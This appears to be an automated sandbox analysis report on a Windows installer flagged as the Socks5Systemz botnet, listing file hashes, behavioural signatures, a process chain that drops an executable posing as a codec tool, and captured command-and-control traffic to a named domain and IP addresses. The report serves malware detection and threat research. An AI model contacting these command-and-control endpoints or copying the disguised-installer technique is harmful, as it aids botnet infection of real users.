Analysis
-
max time kernel
141s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
03/11/2024, 06:30 UTC
General
-
Target
530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746dN.exe
-
Size
4.1MB
-
MD5
49b41322a9004a9d62187251ff5654d0
-
SHA1
5f73f7ed0f63ad46a8d9482adbcf6663857aa1ac
-
SHA256
530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746d
-
SHA512
5f02bc3c11b86343c1bf57fc09ce669a4f66b5eb5c0e1a5dbb304f8b06986c0bfe5e9d81087c58fab074ec8f1a0d38c0a2d4c574c5cf148bf1d5a8706dcca56b
-
SSDEEP
98304:I+1egWNBi1GiYxMaDNMxS/ny3G1A1xSCFjmcNp:0qY5M8y3GcBtmcNp
Malware Config
Signatures
-
Detect Socks5Systemz Payload 3 IoCs
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Socks5systemz family
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 5 IoCs
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746dN.exe"C:\Users\Admin\AppData\Local\Temp\530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746dN.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-NT1IP.tmp\530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746dN.tmp"C:\Users\Admin\AppData\Local\Temp\is-NT1IP.tmp\530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746dN.tmp" /SL5="$400F8,4052791,54272,C:\Users\Admin\AppData\Local\Temp\530139afd5a1ff04dd836fd96991f3cee901328cdb101c58afa877bcbeca746dN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Dan Codecs Portable\dancodecsportable.exe"C:\Users\Admin\AppData\Local\Dan Codecs Portable\dancodecsportable.exe" -i3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
Network
-
DNSbdlwkqd.comRemote address:45.155.250.90:53Requestbdlwkqd.comIN AResponsebdlwkqd.comIN A185.208.158.202 -
GEThttp://bdlwkqd.com/search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f271ea771795af8e05c444db22f31df92d8b38e316a667d307eca743ec4c2b07b5296692386788fe14c5ec90Remote address:185.208.158.202:80RequestGET /search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f271ea771795af8e05c444db22f31df92d8b38e316a667d307eca743ec4c2b07b5296692386788fe14c5ec90 HTTP/1.1
Host: bdlwkqd.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
ResponseHTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sun, 03 Nov 2024 06:33:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
-
GEThttp://bdlwkqd.com/search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12eab517aa5c96bd86e895834a805a8bbc896c58e713bc90c91a36b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff812c0e9949f3ece6aRemote address:185.208.158.202:80RequestGET /search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12eab517aa5c96bd86e895834a805a8bbc896c58e713bc90c91a36b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff812c0e9949f3ece6a HTTP/1.1
Host: bdlwkqd.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
ResponseHTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sun, 03 Nov 2024 06:33:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
-
185.208.158.202:80http://bdlwkqd.com/search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12eab517aa5c96bd86e895834a805a8bbc896c58e713bc90c91a36b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff812c0e9949f3ece6ahttp
HTTP Request
GET http://bdlwkqd.com/search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f271ea771795af8e05c444db22f31df92d8b38e316a667d307eca743ec4c2b07b5296692386788fe14c5ec90HTTP Response
200HTTP Request
GET http://bdlwkqd.com/search/?q=67e28dd86c5ea07d445fab4a7c27d78406abdd88be4b12eab517aa5c96bd86e895834a805a8bbc896c58e713bc90c91a36b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff812c0e9949f3ece6aHTTP Response
200 -
89.105.201.183:2023
-
45.155.250.90:53bdlwkqd.comdns
DNS Request
bdlwkqd.com
DNS Response
185.208.158.202
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD5458e52194fce2f10b543a9e2bb5131fd
SHA1141742fa4b769232dfbe718ad9fd87d410494b87
SHA2565a9803961be30c0a751dab01fe080371e9d2d4d0ad6a23b60b455c72b52cdcf0
SHA512f22281abf92f4e46c62f398b948bfc54eec624be0e6072405610b8ebd36633d2202bccde666536f473b39f976d3100ab9bc5d55ee898703c63eebfd7d1dc81d2
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
689KB
MD553d2b7460e392ca1a72a2879c9d72aac
SHA1abd470089a3f58f5ec4884aa32a038f616e040b1
SHA2562d96a48a093dc0f1f5ce6b7f74ed5d0c3d80190dbf3b214826ce17a1e0ad6708
SHA512acbf0d936da9a71ad76f9cfeff637694fd0b1d7d0bd85714bb4feb19cfb5181133ecd327ae5fe32548d9ddeeb2dd4bf4d53aa81109a19e6b8d8b88219cd2259c
-
Filesize
80KB
-
Filesize
40KB
-
Filesize
80KB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
752KB
-
Filesize
752KB
-
Filesize
648KB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
3.1MB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
3.1MB
-
Filesize
3.1MB